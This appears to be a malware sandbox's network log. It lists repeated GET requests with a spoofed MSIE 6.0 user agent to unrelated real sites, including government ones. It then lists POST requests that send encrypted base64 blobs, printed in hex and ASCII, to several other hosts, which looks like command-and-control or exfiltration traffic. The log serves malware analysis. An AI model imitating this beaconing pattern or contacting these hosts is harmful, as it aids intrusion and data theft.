              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 43 66 44 32 48 66 6d 30 33 73 55 6b 48 45 38 49 69 46 6f 71 73 5a 49 66 31 2b 58 58 62 58 2b 42 50 53 63 62 2f 71 36 64 35 50 33 34 44 45 62 49 65 30 4f 41 39 5a 7a 36 2f 52 55 4e 4d 31 46 64 44 37 33 58 4e 34 64 69 55 50 65 78 49 33 58 37 61 47 78 44 37 5a 7a 47 68 41 61 54 38 42 52 6c 6f 37 45 32 4c 46 72 4d 57 5a 33 6d 33 53 78 55 64 44 44 57 67 54 2b 6a 65 2f 35 42 66 76 63 41 7a 51 4c 61 6c 51 76 50 38 64 49 30 77 68 45 48 79 6e 4d 43 43 37 54 45 56 35 44 44 2b 48 75 45 62 4f 6b 38 53 6b 7a 43 77 4d 6e 2f 76 34 69 6a 68 6b 48 55 63 54 4f 67 52 51 2b 65 54 38 62 66 2f 6e 70 33 76 4d 37 5a 78 43 76 69 72 73 51 56 4f 71 68 51 70 76 76 49 50 38 38 49 5a 45 67 58 30 4c 31 47 34 34 4c 66 44 68 69 76 4d 43 65 55 31 78 57 58 72 59 62 4a 7a 47 63 38 4e 35 4d 59 79 73 6d 31 55 5a 77 66 70 59 55 57 62 78 72 55 39 51 44 46 67 45 5a 31 72 4a 77 77 56 57 57 44 75 68 6d 41 2b 42 70 74 41 57 34 59 59 4f 79 48 52 50 6c 43 32 6d 38 4a 67 68 52 76 41 37 6e 47 41 49 46 65 71 66 6e 35 46 6c 30 43 56 57 30 57 62 4e 63 64 30 4d 6e 36 58 6e 5a 6d 48 5a 6a 43 30 4a 70 2f 37 30 68 71 78 72 41 79 2b 6a 68 37 52 33 36 48 50 49 30 4a 6b 58 67 68 44 35 45 42 71 76 42 6a 47 48 30 6f 37 69 58 4b 33 4a 78 65 2b 69 6d 76 6a 55 71 37 6d 4e 44 54 65 41 38 64 6c 6d 4e 33 68 35 74 77 56 63 71 36 6c 63 37 56 4a 49 43 71 43 62 51 77 51 52 61 6a 33 4c 4f 68 5a 75 35 71 6e 75 54 59 2f 52 75 30 33 38 44 67 4c 6b 61 32 4c 52 58 49 6f 59 4b 77 51 4f 6f 34 77 50 4c 65 76 47 41 36 75 67 4e 78 56 67 76 6e 79 43 4f 52 4b 2f 49 76 4a 5a 54 2f 39 6d 47 51 42 72 6a 42 4c 2b 73 52 7a 5a 37 43 35 78 50 74 4d 2b 6a 68 55 6a 47 72 54 73 7a 30 32 51 35 74 49 77 4f 4e 30 77 3d 3d Data Ascii: CfD2Hfm03sUkHE8IiFoqsZIf1+XXbX+BPScb/q6d5P34DEbIe0OA9Zz6/RUNM1FdD73XN4diUPexI3X7aGxD7ZzGhAaT8BRlo7E2LFrMWZ3m3SxUdDDWgT+je/5BfvcAzQLalQvP8dI0whEHynMCC7TEV5DD+HuEbOk8SkzCwMn/v4ijhkHUcTOgRQ+eT8bf/np3vM7ZxCvirsQVOqhQpvvIP88IZEgX0L1G44LfDhivMCeU1xWXrYbJzGc8N5MYysm1UZwfpYUWbxrU9QDFgEZ1rJwwVWWDuhmA+BptAW4YYOyHRPlC2m8JghRvA7nGAIFeqfn5Fl0CVW0WbNcd0Mn6XnZmHZjC0Jp/70hqxrAy+jh7R36HPI0JkXghD5EBqvBjGH0o7iXK3Jxe+imvjUq7mNDTeA8dlmN3h5twVcq6lc7VJICqCbQwQRaj3LOhZu5qnuTY/Ru038DgLka2LRXIoYKwQOo4wPLevGA6ugNxVgvnyCORK/IvJZT/9mGQBrjBL+sRzZ7C5xPtM+jhUjGrTsz02Q5tIwON0w==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 4f 6f 68 41 47 32 79 65 33 73 58 57 56 33 69 32 56 77 5a 6f 64 48 2b 4d 31 55 50 45 43 31 75 76 59 43 59 51 54 4e 73 4c 36 47 71 48 32 53 56 72 64 39 76 34 70 6f 69 69 6a 56 32 47 61 50 6a 55 37 34 46 72 77 4e 57 31 31 2b 36 6b 69 6b 38 61 33 6b 38 30 49 56 4d 6f 35 67 2f 47 73 61 4b 6d 2b 46 50 4e 41 52 39 6d 47 6c 34 66 59 4b 58 70 39 6d 35 39 61 32 73 4b 43 48 51 42 4e 48 4d 2f 65 31 70 65 6f 41 4e 37 6a 48 4a 51 4e 4e 43 4d 49 44 69 33 48 58 65 5a 4f 50 6e 4d 72 4c 58 34 2f 63 6c 37 67 74 31 39 56 32 64 58 38 74 69 42 46 61 2b 43 6c 35 2f 53 4c 7a 54 2b 70 56 69 61 77 65 45 49 6f 70 31 58 32 34 4c 45 47 66 52 78 63 6e 33 43 78 76 68 37 58 38 5a 41 4b 76 45 33 48 6f 73 53 36 6f 6f 6a 4a 38 44 4f 7a 4e 67 2f 36 50 51 42 39 76 30 4a 32 46 76 4d 35 41 69 57 61 43 75 71 59 6a 46 6a 52 55 6a 43 41 65 54 65 79 66 33 2f 6c 56 45 6f 34 74 49 71 6e 30 6d 77 43 33 54 54 54 41 31 36 65 4e 31 78 74 31 31 67 77 73 2f 6e 5a 72 44 64 77 63 44 58 47 79 71 34 56 53 77 44 32 59 45 4b 39 74 73 70 69 6c 63 38 46 36 65 6d 67 69 2f 4a 6b 6b 62 41 42 52 53 43 6f 39 4c 66 74 62 77 77 68 34 61 73 53 6e 47 43 72 62 7a 78 54 39 34 31 53 34 62 33 34 55 31 2f 59 41 62 52 79 56 65 78 68 6c 4b 76 30 68 73 45 4e 63 59 4b 4b 41 2b 32 6e 54 50 70 44 69 44 76 61 51 52 6d 79 4e 78 2b 56 4d 46 6e 64 36 50 57 32 42 7a 72 35 57 59 37 2b 42 58 6f 4d 72 63 43 57 78 62 66 61 70 46 4f 55 4a 52 61 6b 49 64 41 32 41 51 4f 30 41 66 70 55 35 54 58 70 43 35 55 70 51 39 69 52 4b 64 70 75 74 6b 55 6a 52 53 65 4f 6f 53 31 42 74 38 4e 38 75 51 51 67 34 49 43 37 57 2b 39 46 5a 2f 38 57 63 6b 37 70 55 66 54 56 79 69 4b 49 71 39 6d 67 32 71 41 6f 64 42 42 63 4b 32 61 55 56 68 6b 36 56 4b 48 73 39 2b 47 56 52 70 50 4e 74 44 63 4d 65 54 61 38 74 44 74 6b 76 57 79 71 51 6c 35 32 73 59 71 5a 31 67 72 66 49 4d 52 44 52 77 3d Data Ascii: OohAG2ye3sXWV3i2VwZodH+M1UPEC1uvYCYQTNsL6GqH2SVrd9v4poiijV2GaPjU74FrwNW11+6kik8a3k80IVMo5g/GsaKm+FPNAR9mGl4fYKXp9m59a2sKCHQBNHM/e1peoAN7jHJQNNCMIDi3HXeZOPnMrLX4/cl7gt19V2dX8tiBFa+Cl5/SLzT+pViaweEIop1X24LEGfRxcn3Cxvh7X8ZAKvE3HosS6oojJ8DOzNg/6PQB9v0J2FvM5AiWaCuqYjFjRUjCAeTeyf3/lVEo4tIqn0mwC3TTTA16eN1xt11gws/nZrDdwcDXGyq4VSwD2YEK9tspilc8F6emgi/JkkbABRSCo9Lftbwwh4asSnGCrbzxT941S4b34U1/YAbRyVexhlKv0hsENcYKKA+2nTPpDiDvaQRmyNx+VMFnd6PW2Bzr5WY7+BXoMrcCWxbfapFOUJRakIdA2AQO0AfpU5TXpC5UpQ9iRKdputkUjRSeOoS1Bt8N8uQQg4IC7W+9FZ/8Wck7pUfTVyiKIq9mg2qAodBBcK2aUVhk6VKHs9+GVRpPNtDcMeTa8tDtkvWyqQl52sYqZ1grfIMRDRw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 30 58 53 34 47 31 4b 69 33 73 57 35 38 48 34 71 42 64 31 72 31 31 58 4c 6a 73 6d 69 7a 42 6f 47 70 75 56 4e 50 64 72 41 44 6b 41 49 42 47 32 4b 6f 6a 4d 75 73 70 38 64 4f 4d 65 47 58 4d 45 63 68 35 79 30 6e 4c 30 43 71 45 32 54 77 50 47 59 31 7a 48 47 61 58 4a 71 4b 73 39 49 52 32 76 75 36 4b 5a 74 71 7a 79 36 79 55 35 51 35 32 75 79 38 5a 62 30 77 4b 4d 4d 70 51 4d 62 78 76 73 6c 61 44 61 51 59 63 35 5a 63 70 4f 32 46 71 38 5a 47 31 36 79 35 77 38 6e 65 71 56 39 4b 56 43 73 2b 4d 30 62 32 75 48 64 79 44 6b 2b 78 65 4a 4a 67 53 4f 46 44 35 4c 49 64 77 6b 68 76 57 47 73 38 64 44 55 48 78 39 6c 43 61 66 78 45 33 2b 58 58 47 55 47 52 35 58 72 30 75 66 48 6e 6e 76 61 74 62 67 66 77 63 70 2f 6b 53 5a 6f 57 66 32 58 71 6c 32 78 35 6a 30 56 42 6a 56 37 76 59 54 6d 6d 70 6a 45 36 66 6d 5a 78 33 37 44 68 31 30 65 52 53 2b 6f 42 38 56 70 78 69 6a 47 6e 4a 31 6a 78 68 68 4a 63 38 43 4c 6c 47 43 71 4c 32 36 44 33 74 32 70 6b 64 5a 77 59 46 48 33 4a 7a 79 58 39 68 4c 36 6c 75 79 65 2b 56 58 51 64 75 4c 47 4d 6f 74 2f 33 6d 2b 6c 38 77 30 70 4a 49 44 61 79 43 61 4a 76 43 61 30 5a 71 43 73 41 30 4a 6c 2f 43 55 56 42 66 6c 4e 67 4f 6a 6d 66 61 45 41 6e 4c 41 44 58 31 2b 36 4d 50 54 6f 4f 62 5a 70 5a 34 6d 51 46 39 4d 4d 4a 63 69 53 48 62 31 52 44 34 33 66 48 30 44 58 5a 74 74 4d 50 37 38 2b 35 33 74 2b 43 6a 43 42 2b 55 47 31 61 7a 39 4b 62 4f 31 63 61 45 4b 76 36 37 68 6e 51 34 72 78 6b 68 4d 71 6f 4a 4d 65 36 47 4a 49 78 50 62 63 70 77 74 2f 44 64 43 57 4e 44 2b 63 78 72 6e 54 78 4d 6e 32 53 6b 64 4f 4e 75 41 73 79 4a 56 73 30 37 4e 42 79 6e 48 48 36 55 76 70 52 36 55 6d 66 61 4f 37 68 4a 48 54 4f 48 46 38 6b 5a 4d 46 42 75 4b 75 49 5a 77 69 65 6b 62 76 72 37 75 76 6d 4c 43 4c 66 64 68 6a 49 6a 43 50 37 77 67 4a 73 45 42 4f 51 48 54 70 31 52 4e 7a 76 33 75 41 49 76 35 6e 75 67 3d 3d Data Ascii: 0XS4G1Ki3sW58H4qBd1r11XLjsmizBoGpuVNPdrADkAIBG2KojMusp8dOMeGXMEch5y0nL0CqE2TwPGY1zHGaXJqKs9IR2vu6KZtqzy6yU5Q52uy8Zb0wKMMpQMbxvslaDaQYc5ZcpO2Fq8ZG16y5w8neqV9KVCs+M0b2uHdyDk+xeJJgSOFD5LIdwkhvWGs8dDUHx9lCafxE3+XXGUGR5Xr0ufHnnvatbgfwcp/kSZoWf2Xql2x5j0VBjV7vYTmmpjE6fmZx37Dh10eRS+oB8VpxijGnJ1jxhhJc8CLlGCqL26D3t2pkdZwYFH3JzyX9hL6luye+VXQduLGMot/3m+l8w0pJIDayCaJvCa0ZqCsA0Jl/CUVBflNgOjmfaEAnLADX1+6MPToObZpZ4mQF9MMJciSHb1RD43fH0DXZttMP78+53t+CjCB+UG1az9KbO1caEKv67hnQ4rxkhMqoJMe6GJIxPbcpwt/DdCWND+cxrnTxMn2SkdONuAsyJVs07NBynHH6UvpR6UmfaO7hJHTOHF8kZMFBuKuIZwiekbvr7uvmLCLfdhjIjCP7wgJsEBOQHTp1RNzv3uAIv5nug==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 57 70 43 6c 4f 4d 32 53 33 38 55 67 48 34 4b 6f 52 42 56 4d 73 34 61 38 67 63 67 37 41 68 36 34 55 64 44 33 45 78 42 70 71 2b 64 71 33 68 6e 51 62 76 2b 50 6f 67 39 55 43 69 72 36 61 6a 31 6a 55 35 41 32 54 51 36 77 63 49 35 43 49 57 6b 4a 6d 5a 45 30 6a 6f 6b 4c 67 50 59 67 7a 5a 74 4e 79 6a 35 68 61 34 6b 42 41 65 53 69 54 59 46 63 5a 37 58 32 4f 6d 78 4e 50 4a 63 73 59 64 4d 77 2b 6a 62 65 50 4f 52 48 55 6e 70 49 38 68 35 54 62 64 4d 64 56 6e 44 54 54 2f 4f 70 4f 4a 53 5a 49 46 48 38 31 55 44 53 73 52 73 6e 75 43 39 45 76 4e 52 53 72 4a 7a 4a 77 48 74 37 37 62 58 4c 4e 43 32 5a 65 47 30 79 42 70 7a 4f 4b 53 59 75 50 33 4f 44 39 6c 66 4a 7a 76 6b 2f 76 35 56 4f 6e 77 65 68 43 32 70 78 44 41 62 42 36 6c 30 74 2f 54 61 6f 52 79 57 55 2f 73 61 4b 4f 59 68 6b 76 4c 2b 71 65 32 34 4d 73 6d 41 6a 58 6e 64 39 43 6c 69 6d 36 37 57 42 62 53 72 41 71 31 54 4a 32 44 43 66 58 30 4e 72 53 78 33 67 30 55 75 58 75 34 2f 45 32 67 41 56 64 4c 6d 36 79 67 45 67 36 79 5a 56 54 44 33 44 68 6b 39 41 69 4a 56 75 66 55 4e 44 76 4a 55 6e 77 79 58 31 64 4d 56 52 4b 6b 57 76 74 54 36 76 6e 72 69 49 58 77 32 6f 6d 39 4f 6d 43 74 2b 38 64 2f 30 53 41 79 66 6f 78 7a 67 71 4c 48 6a 70 33 63 4e 48 51 70 66 38 56 63 62 71 48 43 7a 6a 6e 46 44 30 71 66 38 54 38 6d 67 4c 4b 4c 51 37 51 34 55 51 32 63 4e 6a 77 4d 58 67 4d 70 75 32 39 30 41 78 7a 59 31 31 75 73 6a 42 72 45 72 43 6a 7a 61 78 4e 6e 45 59 35 42 77 4c 46 77 37 50 61 4e 70 36 37 32 30 4e 6f 37 6c 36 46 32 57 58 58 4b 4f 33 45 63 37 6c 74 48 34 66 78 67 6f 78 4c 73 31 58 68 69 4e 75 53 75 68 6d 62 49 53 64 6a 71 6e 57 45 48 34 32 52 65 72 67 47 4d 4a 74 4b 4b 4e 78 71 34 6f 3d Data Ascii: WpClOM2S38UgH4KoRBVMs4a8gcg7Ah64UdD3ExBpq+dq3hnQbv+Pog9UCir6aj1jU5A2TQ6wcI5CIWkJmZE0jokLgPYgzZtNyj5ha4kBAeSiTYFcZ7X2OmxNPJcsYdMw+jbePORHUnpI8h5TbdMdVnDTT/OpOJSZIFH81UDSsRsnuC9EvNRSrJzJwHt77bXLNC2ZeG0yBpzOKSYuP3OD9lfJzvk/v5VOnwehC2pxDAbB6l0t/TaoRyWU/saKOYhkvL+qe24MsmAjXnd9Clim67WBbSrAq1TJ2DCfX0NrSx3g0UuXu4/E2gAVdLm6ygEg6yZVTD3Dhk9AiJVufUNDvJUnwyX1dMVRKkWvtT6vnriIXw2om9OmCt+8d/0SAyfoxzgqLHjp3cNHQpf8VcbqHCzjnFD0qf8T8mgLKLQ7Q4UQ2cNjwMXgMpu290AxzY11usjBrErCjzaxNnEY5BwLFw7PaNp6720No7l6F2WXXKO3Ec7ltH4fxgoxLs1XhiNuSuhmbISdjqnWEH42RergGMJtKKNxq4o=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 68 78 2b 47 4b 37 51 6c 33 38 57 53 70 72 59 58 44 35 56 64 34 41 65 2f 6a 49 53 73 6d 48 71 41 4b 4c 35 33 50 33 30 75 51 34 4c 39 36 7a 6a 48 34 6f 31 50 47 31 41 33 53 61 58 32 69 42 62 76 4c 54 41 70 4e 6b 64 41 71 49 72 45 6a 4d 79 35 78 49 61 78 37 47 7a 61 4e 65 78 58 59 78 57 6d 49 75 38 77 74 5a 79 41 53 50 67 70 66 67 2b 59 54 5a 2f 50 5a 4e 38 57 58 31 54 77 77 4e 56 47 74 38 46 30 5a 49 75 52 5a 67 39 37 47 76 56 73 65 58 35 33 41 6e 6a 39 30 46 52 34 47 7a 30 34 68 30 73 65 66 5a 31 55 52 62 6a 59 42 64 41 65 53 2f 57 72 38 69 6e 50 55 79 58 6a 61 67 70 65 39 76 56 2f 51 39 63 67 65 30 64 38 4f 7a 50 7a 49 53 2f 6c 5a 70 71 77 41 6c 45 63 4e 58 42 63 71 64 51 4b 6c 34 6c 6c 46 4a 46 32 7a 36 59 4b 77 43 57 65 5a 4c 67 48 5a 4d 31 33 41 6a 70 63 67 62 4a 69 4a 59 61 72 4f 4c 64 4f 56 74 61 57 58 5a 6d 59 47 4f 67 33 76 6a 78 53 2f 6f 72 6f 78 2b 2f 73 77 47 46 35 31 49 43 4d 66 58 46 66 75 56 41 2b 34 49 56 4b 33 74 34 42 41 6c 51 4b 5a 75 4a 34 70 4a 69 65 50 32 32 7a 70 38 42 58 6a 63 77 6e 33 32 56 48 6c 6b 43 48 61 43 6a 4c 79 7a 4e 2f 73 4a 77 66 55 67 31 73 70 7a 46 30 75 48 65 44 62 33 58 46 56 6f 6c 72 58 41 4e 4b 5a 6f 55 4d 69 75 59 6c 32 65 35 59 6a 6b 35 37 34 78 73 56 46 56 49 55 4f 56 44 58 2b 58 4a 61 38 67 73 59 6a 41 58 4c 6c 36 42 48 33 42 58 54 48 66 71 72 30 51 36 37 4e 32 5a 71 71 6d 41 36 64 2b 4a 46 6e 51 7a 49 42 4a 38 30 54 43 48 59 32 66 59 4d 4c 63 34 56 6e 32 53 61 55 2f 76 71 66 42 6f 71 33 41 4a 38 36 65 36 49 53 4a 37 6a 44 6e 6d 6f 53 48 31 4d 6f 64 37 32 61 58 6e 39 32 32 59 65 57 6e 74 4e 68 69 30 34 55 57 49 51 76 4b 44 6a 6e 62 51 77 4f 36 35 66 54 45 74 37 32 6a 31 33 30 46 38 55 69 47 4a 53 6b 36 35 44 61 51 51 72 56 4f 58 39 64 70 33 6a 78 6e 61 6d 51 51 3d 3d Data Ascii: hx+GK7Ql38WSprYXD5Vd4Ae/jISsmHqAKL53P30uQ4L96zjH4o1PG1A3SaX2iBbvLTApNkdAqIrEjMy5xIax7GzaNexXYxWmIu8wtZyASPgpfg+YTZ/PZN8WX1TwwNVGt8F0ZIuRZg97GvVseX53Anj90FR4Gz04h0sefZ1URbjYBdAeS/Wr8inPUyXjagpe9vV/Q9cge0d8OzPzIS/lZpqwAlEcNXBcqdQKl4llFJF2z6YKwCWeZLgHZM13AjpcgbJiJYarOLdOVtaWXZmYGOg3vjxS/orox+/swGF51ICMfXFfuVA+4IVK3t4BAlQKZuJ4pJieP22zp8BXjcwn32VHlkCHaCjLyzN/sJwfUg1spzF0uHeDb3XFVolrXANKZoUMiuYl2e5Yjk574xsVFVIUOVDX+XJa8gsYjAXLl6BH3BXTHfqr0Q67N2ZqqmA6d+JFnQzIBJ80TCHY2fYMLc4Vn2SaU/vqfBoq3AJ86e6ISJ7jDnmoSH1Mod72aXn922YeWntNhi04UWIQvKDjnbQwO65fTEt72j130F8UiGJSk65DaQQrVOX9dp3jxnamQQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 30 58 53 34 47 31 4b 69 33 73 57 35 38 48 34 71 42 64 31 72 31 31 58 4c 6a 73 6d 69 7a 42 6f 47 70 75 56 4e 50 64 72 41 44 6b 41 49 42 47 32 4b 6f 6a 4d 75 73 70 38 64 4f 4d 65 47 58 4d 45 63 68 35 79 30 6e 4c 30 43 71 45 32 54 77 50 47 59 31 7a 48 47 61 58 4a 71 4b 73 39 49 52 32 76 75 36 4b 5a 74 71 7a 79 36 79 55 35 51 35 32 75 79 38 5a 62 30 77 4b 4d 4d 70 51 4d 62 78 76 73 6c 61 44 61 51 59 63 35 5a 63 70 4f 32 46 71 38 5a 47 31 36 79 35 77 38 6e 65 71 56 39 4b 56 43 73 2b 4d 30 62 32 75 48 64 79 44 6b 2b 78 65 4a 4a 67 53 4f 46 44 35 4c 49 64 77 6b 68 76 57 47 73 38 64 44 55 48 78 39 6c 43 61 66 78 45 33 2b 58 58 47 55 47 52 35 58 72 30 75 66 48 6e 6e 76 61 74 62 67 66 77 63 70 2f 6b 53 5a 6f 57 66 32 58 71 6c 32 78 35 6a 30 56 42 6a 56 37 76 59 54 6d 6d 70 6a 45 36 66 6d 5a 78 33 37 44 68 31 30 65 52 53 2b 6f 42 38 56 70 78 69 6a 47 6e 4a 31 6a 78 68 68 4a 63 38 43 4c 6c 47 43 71 4c 32 36 44 33 74 32 70 6b 64 5a 77 59 46 48 33 4a 7a 79 58 39 68 4c 36 6c 75 79 65 2b 56 58 51 64 75 4c 47 4d 6f 74 2f 33 6d 2b 6c 38 77 30 70 4a 49 44 61 79 43 61 4a 76 43 61 30 5a 71 43 73 41 30 4a 6c 2f 43 55 56 42 66 6c 4e 67 4f 6a 6d 66 61 45 41 6e 4c 41 44 58 31 2b 36 4d 50 54 6f 4f 62 5a 70 5a 34 6d 51 46 39 4d 4d 4a 63 69 53 48 62 31 52 44 34 33 66 48 30 44 58 5a 74 74 4d 50 37 38 2b 35 33 74 2b 43 6a 43 42 2b 55 47 31 61 7a 39 4b 62 4f 31 63 61 45 4b 76 36 37 68 6e 51 34 72 78 6b 68 4d 71 6f 4a 4d 65 36 47 4a 49 78 50 62 63 70 77 74 2f 44 64 43 57 4e 44 2b 63 78 72 6e 54 78 4d 6e 32 53 6b 64 4f 4e 75 41 73 79 4a 56 73 30 37 4e 42 79 6e 48 48 36 55 76 70 52 36 55 6d 66 61 4f 37 68 4a 48 54 4f 48 46 38 6b 5a 4d 46 42 75 4b 75 49 5a 77 69 65 6b 62 76 72 37 75 76 6d 4c 43 4c 66 64 68 6a 49 6a 43 50 37 77 67 4a 73 45 42 4f 51 48 54 70 31 52 4e 7a 76 33 75 41 49 76 35 6e 75 67 3d 3d Data Ascii: 